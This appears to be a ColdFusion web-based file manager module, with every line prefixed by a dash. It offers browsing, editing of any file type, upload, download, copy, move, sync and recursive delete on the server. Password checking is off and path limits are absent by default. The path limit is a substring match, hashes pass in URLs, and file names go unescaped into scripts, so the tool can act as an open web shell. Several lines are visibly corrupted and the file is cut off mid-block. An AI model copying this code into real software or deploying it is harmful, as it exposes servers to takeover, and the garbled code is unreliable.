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- <html>
- <body>
- <!---
- Created by S?bastien Denis -
- 1.0 : 23-nov-2004
- 1.1 : 03-fev-2005 - new action: synchronize
- ============================================================================
- The FileManager can be use as a common file manager or as a CFMODULE use inside an application.
- ============================================================================
- Depending of the action (fuseaction attributes), the other attributes are...
- ============================================================================
- If password is required to access the module.
- Display a form to enter password.
- Hash the password.
- Display the file manager.
- PATH (default= current path)
- EDITEXTENSIONS (list of extensions to enable file edition)
- GETDIR (default = current folder)
- Perform a search.
- Return a query GETDIR and a call to fuseaction = HOME with this query.
- SEARCHNAME (reg exp corresponding to file/folder name)
- SEARCHTEXT (reg exp corresponding to file content)
- RECURSIVE (optional recursive search: 0/1 - default = 0)
- MAXSEARCHRESULT (number of result: n - default = 1)
- Edit a file
- EDITEXTENSIONS (list of extension - show the EDIT button)
- (default = txt,htm,html,cfm,cfml,asp,aspx,php,jsp,js,ini,bat,log,reg,xml,dtd,xslt)
- If "ALL", all files are editable
- Write the edited file
- UPLOAD PATH, NBROFUPLOAD (number of the maximum file to upload at once - default is 20)
- COPYFILE PATH, FILE, PATHNEW (with the new file name)
- COPYDIR PATH, DIR, PATHNEW (with the new folder name)
- MOVEFILE PATH, FILE, PATHNEW (without the new file name)
- MOVEDIR PATH, DIR, PATHNEW (without the new folder name)
- SYNCDIR PATH, PATHNEW (path; origin, pathNew: destination), OVERWRITEALL
- Other attributes:
- ============================================================================
- thisModule the path to this module (cfmodule)
- default = listLast(cgi.script_name,"/\")
- relocate 0/1 (default 1, 0 in recursive call)
- CheckPassword default = ""
- To compare with H to allow access to module
- If no correspondance => fuseaction = password
- If checkPassword = "" => No access control.
- H The Hashed password always required if checkPassword neq "".
- PATHALLOWED The path beyond which the module cannot go.
- default = "" meaning no limits.
- STYLE 0/1 (default = 1) include basic style.
- --->
- <!--- ************ Personal parameter *************** --->
- <cfset attributes.editExtensions = "ALL">
- <!--- ************ Personal parameter *************** --->
- <cfsetting requestTimeout = 1000>
- <!--- formurl2attributes --->
- <cfparam name="attributes" default="#structNew()#">
- <cfset structAppend(attributes,form,"no")>
- <cfset structAppend(attributes,url,"no")>
- <!--- Default parameters --->
- <cfparam name="attributes.path" default="#expandPath(".")#">
- <cfparam name="attributes.fuseaction" default="home">
- <cfparam name="attributes.recursive" default="0">
- <cfparam name="attributes.showpath" default="0">
- <cfparam name="attributes.searchtext" default="">
- <cfparam name="attributes.searchname" default="">
- <cfparam name="attributes.maxsearchresult" default="1">
- <cfparam name="attributes.checkpassword" default="">
- <cfparam name="attributes.password" default="">
- <cfparam name="attributes.nbrOfUpload" default="20">
- <cfparam name="attributes.editExtensions" default="txt,htm,html,cfm,cfml,asp,aspx,php,jsp,js,ini,bat,log,reg,xml,dtd,xslt">
- <cfparam name="attributes.relocate" default="1">
- <cfparam name="attributes.overwriteAll" default="0">
- <cfparam name="" default="1">
- <cfparam name="attributes.pathAllowed" default="">
- <cfparam name="attributes.thisModule" default="#listLast(cgi.script_name,"/\")#">
- <cfparam name="attributes.h" default="">
- <!--- Find delimiter and set path --->
- <cfif find("/",cgi.CF_TEMPLATE_PATH)>
- <cfset attributes.delimiter = "/">
- <cfelse>
- <cfset attributes.delimiter = "\">
- </cfif>
- <cfset attributes.path = reReplace(attributes.path,"\#attributes.delimiter#{2,}",attributes.delimiter,"ALL")>
- <cfif right(attributes.path,1) eq attributes.delimiter and len(attributes.path) gt 1>
- <cfset attributes.path = left(attributes.path,len(attributes.path)-1)>
- </cfif>
- <!--- UDF --->
- <cfargument name="qs">
- <cfargument name="relocate">
- <cfif relocate>
- </cfif>
- </cffunction>
- <!--- Password check --->
- <cfif attributes.fuseaction neq "passwordHash" and attributes.checkPassword neq "">
- <cfif isDefined("attributes.H")>
- <cfif hash(attributes.checkpassword) neq attributes.H>
- <cfset attributes.fuseaction = "password">
- </cfif>
- <cfelse>
- <cfset attributes.fuseaction = "password">
- </cfif>
- </cfif>
- <!--- Path check --->
- <cfif attributes.pathAllowed neq "">
- <cfif not findNoCase(attributes.pathAllowed,attributes.path)>
- <cfset attributes.path = attributes.pathAllowed>
- <cfset attributes.msg = "Error: cannot go beyond ""#attributes.pathAllowed#""">
- </cfif>
- </cfif>
- <!--- CSS Style --->
- <cfif and attributes.relocate>
- <style>
- body,table,input{font:11px;font-family:verdana}
- button, .button{font:11px;font-family:verdana;width:50;text-align:center;border:1px solid black;background-color:#EEEEEE;cursor:hand;padding:1 0 1 0;}
- </style>
- </cfif>
- <!--- Fusebox --->
- <cfswitch expression="#attributes.fuseaction#">
- <cfcase value="password">
- <cfoutput>
- <form action="?" method="post">
- <input type="hidden" name="fuseaction" value="passwordHash">
- Password: <input type="password" name="password"> <input type="submit" name="submit" value="Submit" class="button">
- </form>
- </cfoutput>
- </cfcase>
- <cfcase value="passwordHash">
- <cfoutput>
- <script>window.location.href="?h=#hash(attributes.password)#";</script>
- </cfoutput>
- </cfcase>
- <cfcase value="home">
- <cfoutput>
- <title>FileManager: #attributes.path#</title>
- <script>
- function addDir(){
- var sDirNew = prompt("Create folder in #JSStringFormat(attributes.path)#.\nFolder name:","");
- if (sDirNew != null && sDirNew != ""){
- window.location.href="?fuseaction=addDir&path=#JSStringFormat(attributes.path)#&dirNew=" + sDirNew + "&h=#attributes.h#";
- }
- }
- function addFile(){
- var sFileNew = prompt("Create file in #JSStringFormat(attributes.path)#.\nFile name:","");
- if (sFileNew != null && sFileNew != ""){
- window.location.href="?fuseaction=addFile&path=#JSStringFormat(attributes.path)#&fileNew=" + sFileNew + "&h=#attributes.h#";
- }
- }
- function renameFile(sFile){
- var sFileNew = prompt("New file name",sFile + "_copy");
- if (sFileNew != null && sFileNew != "" && sFileNew != sFile){
- window.location.href="?fuseaction=renamefile&path=#JSStringFormat(attributes.path)#&file=" + sFile + "&fileNew=" + sFileNew + "&h=#attributes.h#";
- }
- }
- function renameDir(sDir){
- var sDirNew = prompt("New folder name",sDir + "_copy");
- if (sDirNew != null && sDirNew != "" && sDirNew != sDir){
- window.location.href="?fuseaction=renameDir&path=#JSStringFormat(attributes.path)#&dir=" + sDir + "&dirNew=" + sDirNew + "&h=#attributes.h#";
- }
- }
- function copyFile(sFile){
- sDefault = "#JSStringFormat(attributes.path)##JSStringFormat(attributes.delimiter)#" + sFile;
- var sPathNew = prompt("Destination for \"" + sFile + "\".",sDefault);
- if (sPathNew != null && sPathNew != "" && sPathNew != sDefault){
- window.location.href="?fuseaction=copyFile&path=#JSStringFormat(attributes.path)#&pathNew=" + sPathNew + "&file=" + sFile + "&h=#attributes.h#";
- }
- }
- function copyDir(sDir){
- sDefault = "#JSStringFormat(attributes.path)##JSStringFormat(attributes.delimiter)#" + sDir;
- var sPathNew = prompt("Destination for \"" + sDir + "\".\nProvide a UNEXISTANT path!",sDefault + "_copy");
- if (sPathNew != null && sPathNew != "" && sPathNew != sDefault){
- window.location.href="?fuseaction=copydir&path=#JSStringFormat(attributes.path)#&dir=" + sDir + "&pathNew=" + sPathNew + "&h=#attributes.h#";
- }
- }
- function moveFile(sFile){
- sDefault = "#JSStringFormat(attributes.path)#";
- var sPathNew = prompt("Move \"" + sFile + "\" to:",sDefault);
- if (sPathNew != null && sPathNew != "" && sPathNew != sDefault){
- window.location.href="?fuseaction=moveFile&path=#JSStringFormat(attributes.path)#&pathNew=" + sPathNew + "&file=" + sFile + "&h=#attributes.h#";
- }
- }
- function moveDir(sDir){
- sDefault = "#JSStringFormat(attributes.path)#";
- var sPathNew = prompt("Move \"" + sDir + "\" to:",sDefault);
- if (sPathNew != null && sPathNew != "" && sPathNew != sDefault){
- window.location.href="?fuseaction=moveDir&path=#JSStringFormat(attributes.path)#&pathNew=" + sPathNew + "&dir=" + sDir + "&h=#attributes.h#";
- }
- }
- function syncDir(sDir){
- sDefault = "#JSStringFormat(attributes.path)#" + "\\" + sDir;
- var sPathNew = prompt("Synchronize \"" + sDefault + "\" to:",sDefault);
- var bOverwriteAll = 0;
- if (sPathNew != null && sPathNew != "" && sPathNew != sDefault){
- if (confirm("Do yout want to overwrite all files?\nOK: copy all files.\nCancel: copy new and modified files.")) bOverwriteAll = 1;
- window.location.href="?fuseaction=syncDir&path=" + sDefault + "&pathNew=" + sPathNew + "&overwriteall=" + bOverwriteAll + "&h=#attributes.h#";
- }
- }
- function deleteFile(sFile){
- if (confirm("Delete \"" + sFile + "\"?"))window.location.href="?fuseaction=deletefile&path=#JSStringFormat(attributes.path)#&file=" + sFile + "&h=#attributes.h#";
- }
- function deleteDir(sDir){
- if (confirm("Delete \"" + sDir + "\"?"))window.location.href="?fuseaction=deletedir&path=#JSStringFormat(attributes.path)#&dir=" + sDir + "&h=#attributes.h#";
- }
- function showNextUpload(n){
- document.getElementById("fileUpload" + n).style.display='';
- document.getElementById("submitUpload").style.display='';
- }
- </script>
- <cfif isDefined("attributes.msg")>
- <h4 style="color:#iif(findNoCase("error",attributes.msg),"'red'","'green'")#">#attributes.msg#</h4>
- </cfif>
- <cfif len(attributes.path) gt 1>
- <cfset attributes.parentpath = listDeleteAt(attributes.path,listLen(attributes.path,attributes.delimiter),attributes.delimiter)>
- <cfelse>
- <cfset attributes.parentpath = "">
- </cfif>
- <table style="border:1 solid black">
- <form action="?" method="post">
- <input type="hidden" name="h" value="#attributes.h#">
- <tr>
- <td width="100">Parent:</td>
- <td><a href="?path=#attributes.parentpath#&h=#attributes.h#">#attributes.parentpath#</a></td>
- </tr>
- <tr>
- <td valign="top">Path:</td>
- <td>
- <input type="text" name="path" value="#attributes.path#" style="font-weight:bold" size="100">
- <input type="submit" value="Submit" class="button"><br>
- <button style="width:150" onclick="addDir()">Create a folder</button>
- <button style="width:150" onclick="addFile()">Create a file</button>
- </td>
- </tr>
- </form>
- <form action="?" method="post">
- <input type="hidden" name="h" value="#attributes.h#">
- <input type="hidden" name="fuseaction" value="search">
- <input type="hidden" name="path" value="#attributes.path#">
- <tr>
- <td>Search:</td>
- <td><span style="width:150">File/folder name (RE):</span><input type="text" name="searchname" size="70" value="#attributes.searchname#"></td>
- </tr>
- <tr>
- <td> </td>
- <td><span style="width:150">Containg text (RE):</span><input type="text" name="searchtext" size="70" value="#attributes.searchtext#"></td>
- </tr>
- <tr>
- <td> </td>
- <td>
- Recursive <input type="checkbox" name="recursive" value="1" #iif(attributes.recursive,"'checked'","''")#>
- Max. result <select name="maxsearchresult">
- <option value="1" #iif(attributes.maxsearchresult eq 1,"'SELECTED'","''")#>1</option>
- <option value="5" #iif(attributes.maxsearchresult eq 5,"'SELECTED'","''")#>5</option>
- <option value="10" #iif(attributes.maxsearchresult eq 10,"'SELECTED'","''")#>10</option>
- <option value="50" #iif(attributes.maxsearchresult eq 50,"'SELECTED'","''")#>50</option>
- <option value="100" #iif(attributes.maxsearchresult eq 100,"'SELECTED'","''")#>100</option>
- </select>
- <input type="submit" value="Submit" class="button"></td>
- </tr>
- </form>
- <form action="?" method="post" enctype="multipart/form-data">
- <input type="hidden" name="h" value="#attributes.h#">
- <input type="hidden" name="fuseaction" value="upload">
- <input type="hidden" name="path" value="#attributes.path#">
- <tr>
- <td valign="top">Upload:</td>
- <td>
- <span style="width:20">1.</span><input type="File" name="file1" size="70" onchange="showNextUpload(2)">
- <input type="checkbox" name="overwrite1">Overwrite
- <cfloop index="i" from="2" to="#attributes.nbrOfUpload#">
- <div id="fileUpload#i#" style="display:'none'">
- <span style="width:20">#i#.</span><input type="File" name="file#i#" size="70" onchange="showNextUpload(#i+1#)">
- <input type="checkbox" name="overwrite#i#">Overwrite
- </div>
- </cfloop>
- <input type="submit" value="Upload" name="submitUpload" class="button" style="display:'none'">
- </td>
- </tr>
- </form>
- </table>
- </cfoutput>
- <cfflush>
- <cfif not isDefined("attributes.getDir")>
- <cfdirectory action="LIST" directory="#attributes.path#" name="attributes.getDir">
- </cfif>
- <br>
- <table style="border:1 solid black">
- <tr bgcolor="#c0c0c0">
- <th> </th>
- <cfset colspan = 1>
- <cfif attributes.showpath>
- <cfset colspan = 2>
- <th>Path</th>
- </cfif>
- <th>Name</th>
- <th>Actions</th>
- <th>Size</th>
- <th>Attr.</th>
- <th>Modif. date</th>
- </tr>
- <cfoutput>
- <tr>
- <td colspan="#colspan#"><hr size="1"></td>
- <td align="center"><b>F o l d e r s</b></td>
- <td colspan="10"><hr size="1"></td>
- </tr>
- </cfoutput>
- <cfset i = 0>
- <cfoutput query="attributes.getDir">
- <cfif type eq "dir" and name neq "." and name neq "..">
- <cfset i = i + 1>
- <tr bgcolor="#iif(evaluate(i Mod 2),"'F2F2F2'","'EFEFE2'")#">
- <td>#i#.</td>
- <cfif attributes.showpath>
- <td><a href="?path=#path#&h=#attributes.h#" style="text-decoration:none">#path#</a></td>
- <td><a href="?path=#path##attributes.delimiter##name#&h=#attributes.h#" style="text-decoration:none"><b>#name#</b></a></td>
- <td><a onclick="window.location.href='?path=#JSStringFormat("#path##attributes.delimiter##name#&h=#attributes.h#")#'" class="button">Open</a></td>
- <cfelse>
- <td><a href="?path=#attributes.path##attributes.delimiter##name#&h=#attributes.h#" style="text-decoration:none"><b>#name#</b></a></td>
- <td>
- <a onclick="window.location.href='?path=#JSStringFormat(attributes.path & attributes.delimiter)##name#&h=#attributes.h#'" class="button">Open</a>
- <a onclick="renameDir('#name#')" class="button">Rename</a>
- <a onclick="copyDir('#name#')" class="button">Copy</a>
- <a onclick="moveDir('#name#')" class="button">Move</a>
- <a onclick="deleteDir('#name#')" class="button" style="color:red">Delete</a>
- <a onclick="syncDir('#name#')" class="button">Sync.</a>
- </td>
- </cfif>
- <td> </td>
- <td>#ATTRIBUTES# </td>
- </tr>
- </cfif>
- </cfoutput>
- <cfoutput>
- <tr>
- <td colspan="#colspan#"><hr size="1"></td>
- <td align="center"><b>F i l e s</b></td>
- <td colspan="10"><hr size="1"></td>
- </tr>
- </cfoutput>
- <cfoutput query="attributes.getDir">
- <cfif type eq "file">
- <cfset i = i + 1>
- <tr bgcolor="#iif(evaluate(i Mod 2),"'F2F2F2'","'EFEFE2'")#">
- <td>#i#.</td>
- <cfif attributes.showpath>
- <td><a href="?path=#path#&h=#attributes.h#" style="text-decoration:none">#path#</a></td>
- <td><a href="?fuseaction=download&path=#path#&file=#name#&h=#attributes.h#" style="text-decoration:none"><b>#name#</b></a></td>
- <cfif attributes.editExtensions eq "ALL" or listFindNoCase(attributes.editExtensions,listLast(name,"."))>
- <td>
- <a onclick="window.location.href='?fuseaction=edit&path=#JSStringFormat(path)#&h=#attributes.h#&file=#name#'" class="button">Edit</a>
- <a onclick="window.location.href='?fuseaction=download&path=#JSStringFormat(path)#&h=#attributes.h#&file=#name#'" class="button">Down.</a>
- </td>
- </cfif>
- <cfelse>
- <td><a href="?fuseaction=download&path=#attributes.path#&file=#name#&h=#attributes.h#" style="text-decoration:none">#name#</a></td>
- <td>
- <a onclick="window.location.href='?fuseaction=download&path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#name#'" class="button">Down.</a>
- <a onclick="renameFile('#name#')" class="button">Rename</a>
- <a onclick="copyFile('#name#')" class="button">Copy</a>
- <a onclick="moveFile('#name#')" class="button">Move</a>
- <a onclick="deleteFile('#name#')" class="button" style="color:red">Delete</a>
- <cfif attributes.editExtensions eq "ALL" or listFindNoCase(attributes.editExtensions,listLast(name,"."))>
- <a onclick="window.location.href='?fuseaction=edit&path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#name#'" class="button">Edit</a>
- </cfif>
- <cfif Find("R",attributes)>
- <a onclick="window.location.href='?fuseaction=removeR&path=#JSStringFormat(attributes.path)#&file=#name#&fileNew=#name#&h=#attributes.h#'" class="button">Rem RO</a>
- </cfif>
- </td>
- </cfif>
- <td align="right">#numberFormat(size)# B</td>
- <td>#ATTRIBUTES# </td>
- </tr>
- </cfif>
- </cfoutput>
- </table>
- </cfcase>
- <cfcase value="edit">
- <cfoutput><title>FileManager: #attributes.file#</title></cfoutput>
- <cffile action="READ" file="#attributes.path##attributes.delimiter##attributes.file#" variable="filecontent">
- <cfdirectory action="LIST" directory="#attributes.path##attributes.delimiter#" filter="#attributes.file#" name="getFile">
- <cfif findNoCase("R",getFile.attributes[1])>
- <cfoutput>
- <div>
- <span style="color:red;font-weight:bold">This file is READ-ONLY</span>
- <button onclick="window.location.href='?fuseaction=removeR&path=#JSStringFormat(attributes.path)#&file=#attributes.file#&fileNew=#attributes.file#&after=edit&h=#attributes.h#'" style="width:150">Remove Read-Only</button>
- <button onclick="history.back()">Back</button>
- </div>
- <pre style="width:100%;height:95%;border:2 solid black">#htmlEditFormat(filecontent)#</pre>
- </cfoutput>
- <cfelse>
- <cfoutput>
- <form action="?" method="post">
- <input type="submit" value="Save Back" style="width:100" class="button">
- <input type="submit" value="Save" onclick="document.all.fuseactionNext.value='edit'" class="button">
- <button onclick="window.location.href='?path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#attributes.file#'">Cancel</button>
- Size: #numberFormat(getFile.size)#B | Date: #getFile.dateLastModified#
- <input type="hidden" name="h" value="#attributes.h#">
- <input type="hidden" name="fuseaction" value="write">
- <input type="hidden" name="fuseactionNext" value="home">
- <input type="hidden" name="path" value="#attributes.path#">
- <input type="hidden" name="file" value="#attributes.file#">
- <textarea style="width:100%;height:95%" name="fileNewContent" style="font-size:11px">#htmlEditFormat(filecontent)#</textarea>
- <div>
- <input type="submit" value="Save Back" style="width:100" class="button">
- <input type="submit" value="Save" onclick="document.all.fuseactionNext.value='edit'" class="button">
- <button onclick="window.location.href='?path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#attributes.file#'">Cancel</button>
- </div>
- </form>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="write">
- <cftry>
- <cffile action="DELETE" file="#attributes.path##attributes.delimiter##attributes.file#">
- <cffile action="WRITE" file="#attributes.path##attributes.delimiter##attributes.file#" output="#attributes.fileNewContent#" addnewline="No">
- <cfoutput>#location("fuseaction=#attributes.fuseactionNext#&file=#attributes.file#", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("msg=Error while updating file!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="upload">
- <cfset msg = "Upload Result:">
- <cfloop index="i" from="1" to="#attributes.nbrOfUpload#">
- <cfif form["file#i#"] neq "">
- <cftry>
- <cffile action="UPLOAD"
- filefield="form.file#i#"
- destination="#attributes.path#"
- nameconflict="#iif(isDefined("attributes.overwrite#i#"),"'OVERWRITE'","'Error'")#">
- <cfset msg = "#msg#\n - File #i#: OK">
- <cfcatch>
- <cfset msg = "#msg#\n - File #i#: ERROR">
- </cfcatch>
- </cftry>
- </cfif>
- </cfloop>
- <cfoutput>#location("", attributes.relocate)#</cfoutput>
- </cfcase>
- <cfcase value="download">
- <cfheader name="Content-disposition" value="attachment; filename=#attributes.file#">
- <cfcontent file="#attributes.path##attributes.delimiter##attributes.File#">
- </cfcase>
- <cfcase value="deleteFile">
- <cftry>
- <cffile action="delete" file="#attributes.path##attributes.delimiter##attributes.file#">
- <cfoutput>#location("msg=File deleted!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("msg=Error: file not deleted!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="deleteDir">
- <cftry>
- <cfdirectory action="DELETE" directory="#attributes.path##attributes.delimiter##attributes.dir#">
- <cfoutput>#location("msg=Folder deleted!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("fuseaction=deletedirRecursiveConfirm&dir=#attributes.dir#", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="deleteDirRecursiveConfirm">
- <cfoutput>
- <script>
- if(confirm("Folder not deleted. It may contains files or folders.\nTry recursive delete?")) window.location.href="?fuseaction=deletedirRecursive&path=#jsStringFormat(attributes.path)#&dir=#jsStringFormat(attributes.dir)#&h=#attributes.h#";
- else window.location.href="?path=#jsStringFormat(attributes.path)#&h=#attributes.h#";
- </script>
- </cfoutput>
- </cfcase>
- <cfcase value="deleteDirRecursive">
- <cfdirectory action="LIST" name="attributes.getDir" directory="#attributes.path##attributes.delimiter##attributes.dir#">
- <cfoutput><h3>#attributes.path##attributes.delimiter##attributes.dir#</h3></cfoutput>
- <!--- Delete files --->
- <cfloop query="attributes.getDir">
- <cfif type eq "file">
- <cftry>
- <cffile action="delete" file="#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter##name#">
- <cfoutput>
- <div>
- <span style="width:100">FILE:</span>
- #attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter#<b>#name#</b>
- </div>
- </cfoutput>
- <cfcatch/>
- </cftry>
- </cfif>
- </cfloop>
- <!--- Delete sub-folder --->
- <cfloop query="attributes.getDir">
- <cfif type eq "dir">
- <cfmodule template="#attributes.thisModule#"
- fuseaction="deleteDirRecursive"
- h="#attributes.H#"
- path="#attributes.path##attributes.delimiter##attributes.dir#"
- dir="#name#"
- relocate="0">
- </cfif>
- </cfloop>
- <cftry>
- <cfdirectory action="DELETE" directory="#attributes.path##attributes.delimiter##attributes.dir#">
- <cfoutput>
- <div>
- <span style="width:100">FOLDER:</span>
- #attributes.path##attributes.delimiter#<b>#attributes.dir#</b>
- </div>
- </cfoutput>
- <cfcatch/>
- </cftry>
- <cfflush>
- <cfif attributes.relocate>
- <cfoutput>
- <button name="fileManagerButton" style="width:700" onclick="window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'">Deletion done! Back to <b>#attributes.path#</b></button>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="addDir">
- <cftry>
- <cfdirectory action="CREATE" directory="#attributes.path##attributes.delimiter##attributes.dirNew#">
- <cfoutput>#location("msg=Folder created!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("msg=Error: folder not created!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="addFile">
- <cftry>
- <cffile action="WRITE" file="#attributes.path##attributes.delimiter##attributes.fileNew#" output="">
- <cfoutput>#location("msg=File created!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("msg=Error: file not created!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="copyFile">
- <cfif fileExists("#attributes.pathNew#")>
- <cfoutput>
- <script>
- alert("This file already exists!");
- history.back();
- </script>
- </cfoutput>
- <cfabort>
- </cfif>
- <cftry>
- <cfset pathTry = listDeleteAt(attributes.pathNew,listLen(attributes.pathNew,"/\"),"/\")>
- <cfdirectory action="CREATE" directory="#pathTry#">
- <cfcatch/>
- </cftry>
- <cftry>
- <cffile action="COPY" source="#attributes.path##attributes.delimiter##attributes.file#"
- destination="#attributes.pathNew#">
- <cfif attributes.relocate>
- <cfoutput>#location("msg=File copied!", attributes.relocate)#</cfoutput>
- </cfif>
- <cfcatch>
- <cfif attributes.relocate>
- <cfoutput>#location("msg=Error: file not copied", attributes.relocate)#</cfoutput>
- </cfif>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="copyDir">
- <cfif DirectoryExists("#attributes.pathNew#")>
- <cfoutput>
- <script>
- alert("This folder already exists!\nPlease use synchronize function.");
- history.back();
- </script>
- </cfoutput>
- <cfabort>
- </cfif>
- <cfdirectory directory="#attributes.path##attributes.delimiter##attributes.dir#" name="attributes.getDir">
- <!--- create main folder --->
- <cftry>
- <cfdirectory action="CREATE" directory="#attributes.pathNew#">
- <cfoutput><h3>#attributes.pathNew#</h3></cfoutput>
- <cfcatch/>
- </cftry>
- <!--- copy folder content - Recursive copy --->
- <cfloop query="attributes.getDir">
- <cfif type eq "file">
- <cffile
- action="COPY"
- source="#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter##name#"
- destination="#attributes.pathNew##attributes.delimiter##name#"
- attributes="Normal">
- <cfoutput><div>#attributes.pathNew##attributes.delimiter#<b>#name#</b></div></cfoutput>
- <cfflush>
- </cfif>
- </cfloop>
- <cfloop query="attributes.getDir">
- <cfif type eq "dir">
- <cfmodule
- fuseaction="copyDir"
- template="#attributes.thisModule#"
- h="#attributes.H#"
- path="#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter#"
- dir="#name#"
- pathNew="#attributes.pathNew##attributes.delimiter##name#"
- relocate="0">
- </cfif>
- </cfloop>
- <cfif attributes.relocate>
- <cfoutput>
- <button name="fileManagerButton" style="width:700" onclick="window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'">Copy done! Back to <b>#attributes.path#</b></button>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="renameFile">
- <cfif fileExists("#attributes.path##attributes.delimiter##attributes.fileNew#")>
- <cfoutput>
- <script>
- alert("This file already exists!");
- history.back();
- </script>
- </cfoutput>
- <cfabort>
- </cfif>
- <cftry>
- <cffile action="rename" source="#attributes.path##attributes.delimiter##attributes.file#" destination="#attributes.path##attributes.delimiter##attributes.fileNew#" attributes="normal">
- <cfoutput>#location("msg=File updated!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("msg=Error while updating file!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="removeR">
- <cftry>
- <cffile action="rename" source="#attributes.path##attributes.delimiter##attributes.file#" destination="#attributes.path##attributes.delimiter##attributes.fileNew#" attributes="normal">
- <cfset qs = "">
- <cfif isDefined("attributes.after") and attributes.after eq "edit">
- <cfset qs = "fuseaction=edit&file=#attributes.file#&">
- </cfif>
- <cfoutput>#location("#qs#msg=File updated!", attributes.relocate)#</cfoutput>
- <cfcatch>
- <cfoutput>#location("#qs#msg=Error while updating file!", attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- </cfcase>
- <cfcase value="renameDir">
- <cfif DirectoryExists("#attributes.path##attributes.delimiter##attributes.dirNew#")>
- <cfoutput>
- <script>
- alert("This folder already exists!");
- history.back();
- </script>
- </cfoutput>
- <cfabort>
- </cfif>
- <h2>Rename folder - step 1: copy files</h2>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="copyDir"
- h="#attributes.h#"
- path="#attributes.path#"
- pathOrigin="#attributes.path##attributes.delimiter##attributes.dir#"
- pathNew="#attributes.path##attributes.delimiter##attributes.dirNew#"
- relocate="0">
- <h2>Rename folder - step 2: delete files</h2>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="deleteDirRecursive"
- h="#attributes.h#"
- path="#attributes.path#"
- dir="#attributes.dir#"
- relocate="0">
- <cfif attributes.relocate>
- <cfoutput>
- <button name="fileManagerButton" style="width:700" onclick="window.location.href='?path=#jsStringFormat(attributes.path)#&h=#attributes.H#'">Rename done! Back to <b>#attributes.path#</b></button>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="moveFile">
- <h2>Move file - step 1: copy file</h2>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="copyFile"
- h="#attributes.h#"
- path="#attributes.path#"
- file="#attributes.file#"
- pathNew="#attributes.pathNew#"
- relocate="0">
- <h2>Move file - step 2: delete file</h2>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="deleteFile"
- h="#attributes.h#"
- path="#attributes.path#"
- file="#attributes.file#"
- relocate="0">
- <cfoutput>#location("msg=File moved!", attributes.relocate)#</cfoutput>
- </cfcase>
- <cfcase value="moveDir">
- <h1>Move folder - step 1: copy files</h1>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="copyDir"
- h="#attributes.h#"
- pathOrigin="#attributes.path##attributes.delimiter##attributes.dir#"
- pathNew="#attributes.pathNew##attributes.delimiter##attributes.dir#"
- relocate="0">
- <h1>Move folder - step 2: delete files</h1>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="deleteDirRecursive"
- h="#attributes.h#"
- path="#attributes.path#"
- dir="#attributes.dir#"
- relocate="0">
- <cfif attributes.relocate>
- <cfoutput>
- <button name="fileManagerButton" style="width:700" onclick="window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'">Move done! Back to <b>#attributes.path#</b></button>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="syncDir">
- <cfif attributes.relocate>
- <cfoutput><h1>Synchronize</h1><h3>From... #attributes.path#</h3><h3>To... #attributes.pathNew#</h3><hr></cfoutput>
- </cfif>
- <cfdirectory directory="#attributes.path#" name="getDir">
- <cfdirectory directory="#attributes.pathNew#" name="getDirNew">
- <!--- create main folder --->
- <cftry>
- <cfdirectory action="CREATE" directory="#attributes.pathNew#">
- <cfoutput><h3 style="color:green">#attributes.pathNew# ... created!</h3></cfoutput>
- <cfcatch><cfoutput><h3>#attributes.pathNew# ... existing!</h3></cfoutput></cfcatch>
- </cftry>
- <!--- copy folder content - Recursive copy --->
- <cfloop query="getDir">
- <cfset getDirCurrentRow = getDir.currentRow>
- <cfif type eq "file">
- <cfset fileExists = 0>
- <!--- Check if file exists --->
- <cfloop query="getDirNew">
- <cfset getDirNewCurrentRow = getDirNew.currentRow>
- <cfif[getDirCurrentRow] eq[getDirNewCurrentRow]>
- <cfset fileExists = 1>
- <cfset fileIsModified = 0>
- <cfif getDir.DATELASTMODIFIED[getDirCurrentRow] gt getDirNew.DATELASTMODIFIED[getDirNewCurrentRow]>
- <cfset fileIsModified = 1>
- </cfif>
- <cfbreak>
- </cfif>
- </cfloop>
- <!--- action --->
- <cfif fileExists>
- <cfif fileIsModified or attributes.overwriteAll>
- <cftry>
- <cffile action="DELETE" file="#attributes.pathNew##attributes.delimiter##name#">
- <cffile
- action="COPY"
- source="#attributes.path##attributes.delimiter##name#"
- destination="#attributes.pathNew##attributes.delimiter##name#"
- attributes="Normal">
